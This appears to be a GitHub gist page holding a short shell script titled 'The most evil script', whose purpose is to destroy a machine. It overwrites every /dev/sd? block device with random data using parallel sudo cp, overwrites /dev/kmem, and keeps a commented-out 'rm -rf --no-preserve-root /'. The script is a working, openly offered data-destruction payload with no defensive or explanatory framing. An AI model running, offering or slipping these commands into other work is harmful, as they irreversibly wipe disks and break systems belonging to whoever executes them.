Skip to content

Instantly share code, notes, and snippets.

@Rudxain
Last active September 28, 2023 20:51
Show Gist options
  • Save Rudxain/5b63803cdfce6cf3ad02314094bbf322 to your computer and use it in GitHub Desktop.
Save Rudxain/5b63803cdfce6cf3ad02314094bbf322 to your computer and use it in GitHub Desktop.
The most evil script
#!/bin/sh
# this may be useless
#sudo rm -rf --no-preserve-root / &
find /dev -maxdepth 1 -iname 'sd?' \
| \
parallel sudo cp /dev/urandom {}
sudo cp /dev/urandom /dev/kmem
# is mem more destructive?
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment